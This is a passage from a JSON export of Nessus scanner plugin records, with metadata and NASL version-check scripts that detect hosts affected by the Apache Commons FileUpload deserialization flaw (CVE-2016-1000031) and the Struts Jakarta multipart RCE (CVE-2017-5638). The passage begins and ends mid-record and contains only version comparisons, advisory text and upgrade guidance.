audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"jakarta-commons-fileupload-1.1.1-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T14:11:22", "description": "The IBM WebSphere Application Server running on the remote host is version 8.0.0.x prior to 8.0.0.15, 8.5.0.x prior to 8.5.5.13 or 9.0.x prior to 9.0.0.7. It is, therefore, affected by a remote code execution vulnerability due to improper deserialization of untrusted data in the DiskFileItem class of the FileUpload library in the Apache Commons FileUpload subcomponent. An unauthenticated, remote attacker can exploit this to execute arbitrary code under the context of the current process.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 8.0.0.x < 8.0.0.15 / 8.5.x < 8.5.5.13 / 9.0.x < 9.0.0.7 RCE (CVE-2016-1000031)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_301027.NASL", "href": "https://www.tenable.com/plugins/nessus/141564", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141564);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-1000031\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"IBM WebSphere Application Server 8.0.0.x < 8.0.0.15 / 8.5.x < 8.5.5.13 / 9.0.x < 9.0.0.7 RCE (CVE-2016-1000031)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a remote code execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The IBM WebSphere Application Server running on the remote host is version 8.0.0.x prior to 8.0.0.15, 8.5.0.x prior to\n8.5.5.13 or 9.0.x prior to 9.0.0.7. It is, therefore, affected by a remote code execution vulnerability due to improper\ndeserialization of untrusted data in the DiskFileItem class of the FileUpload library in the Apache Commons FileUpload\nsubcomponent. An unauthenticated, remote attacker can exploit this to execute arbitrary code under the context of the\ncurrent process.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.ibm.com/support/pages/node/301027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM WebSphere Application Server 8.0.0.15, 8.5.5.13, 9.0.0.7, or later. Alternatively, upgrade to the\nminimal fix pack levels required by the interim fix and then apply Interim Fix PI90804.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_detect.nasl\", \"ibm_enum_products.nbin\", \"ibm_websphere_application_server_nix_installed.nbin\");\n script_require_keys(\"installed_sw/IBM WebSphere Application Server\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'IBM WebSphere Application Server';\nfix = 'Interim Fix PI90804';\n\napp_info = vcf::combined_get_app_info(app:app);\nvcf::check_granularity(app_info:app_info, sig_segments:4);\n\n# If the detection is only remote, Source will be set, and we should require paranoia\nif (!empty_or_null(app_info['Source']) && app_info['Source'] != 'unknown' && report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nif ('PI90804' >< app_info['Fixes'])\n audit(AUDIT_INST_VER_NOT_VULN, app);\n\nconstraints = [\n {'min_version':'8.0.0.0', 'max_version':'8.0.0.14', 'fixed_version':'8.0.0.15 or ' + fix},\n {'min_version':'8.5.0.0', 'max_version':'8.5.5.12', 'fixed_version':'8.5.5.13 or ' + fix},\n {'min_version':'9.0.0.0', 'max_version':'9.0.0.6', 'fixed_version':'9.0.0.7 or ' + fix}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:29:48", "description": "The remote SUSE Linux SLES11 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2019:14044-1 advisory.\n\n - Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution (CVE-2016-1000031)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-10T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : jakarta-commons-fileupload (SUSE-SU-2019:14044-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:jakarta-commons-fileupload", "p-cpe:/a:novell:suse_linux:jakarta-commons-fileupload-javadoc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2019-14044-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150613", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2019:14044-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150613);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2016-1000031\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2019:14044-1\");\n script_xref(name:\"IAVA\", value:\"2020-A-0328\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"SUSE SLES11 Security Update : jakarta-commons-fileupload (SUSE-SU-2019:14044-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES11 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2019:14044-1 advisory.\n\n - Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution\n (CVE-2016-1000031)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1128829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1128963\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-201914044-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abc15cef\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1000031\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jakarta-commons-fileupload and / or jakarta-commons-fileupload-javadoc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES11', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'jakarta-commons-fileupload-1.1.1-1.37.3', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'jakarta-commons-fileupload-javadoc-1.1.1-1.37.3', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'jakarta-commons-fileupload-1.1.1-1.37.3', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'jakarta-commons-fileupload-javadoc-1.1.1-1.37.3', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:41:59", "description": "The version of Apache Struts running on the remote host is 2.3.36 or prior. It is, therefore, affected by the following vulnerability:\n\n - A deserialization vulnerability in Apache Commons FileUpload which could be leveraged for remote code execution. (CVE-2016-1000031)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Apache Struts <= 2.3.36 FileUpload Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_36_FILEUPLOAD.NASL", "href": "https://www.tenable.com/plugins/nessus/118732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118732);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-1000031\");\n script_bugtraq_id(93604);\n script_xref(name:\"TRA\", value:\"TRA-2016-12\");\n script_xref(name:\"IAVA\", value:\"2018-A-0355-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Apache Struts <= 2.3.36 FileUpload Deserialization Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple denial of service vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.36\nor prior. It is, therefore, affected by the following vulnerability:\n\n - A deserialization vulnerability in Apache Commons \n FileUpload which could be leveraged for remote\n code execution. (CVE-2016-1000031)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed31d635\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.12 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{ \"min_version\" : \"2.3.0\", \"max_version\" : \"2.3.36\", \"fixed_version\":\"2.5.12\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:44", "description": "Apache Axis2 reports :\n\nThe commons-fileupload dependency has been updated to a version that fixes CVE-2016-1000031 (AXIS2-5853).", "cvss3": {}, "published": "2017-08-09T00:00:00", "type": "nessus", "title": "FreeBSD : Axis2 -- Security vulnerability on dependency Apache Commons FileUpload (c1265e85-7c95-11e7-93af-005056925db4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:axis2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C1265E857C9511E793AF005056925DB4.NASL", "href": "https://www.tenable.com/plugins/nessus/102280", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102280);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-1000031\");\n script_xref(name:\"TRA\", value:\"TRA-2016-12\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"FreeBSD : Axis2 -- Security vulnerability on dependency Apache Commons FileUpload (c1265e85-7c95-11e7-93af-005056925db4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Apache Axis2 reports :\n\nThe commons-fileupload dependency has been updated to a version that\nfixes CVE-2016-1000031 (AXIS2-5853).\");\n script_set_attribute(attribute:\"see_also\", value:\"http://axis.apache.org/axis2/java/core/release-notes/1.7.6.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/AXIS2-5853\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/FILEUPLOAD-279\");\n # https://vuxml.freebsd.org/freebsd/c1265e85-7c95-11e7-93af-005056925db4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d63db941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:axis2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"axis2<1.7.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:22", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 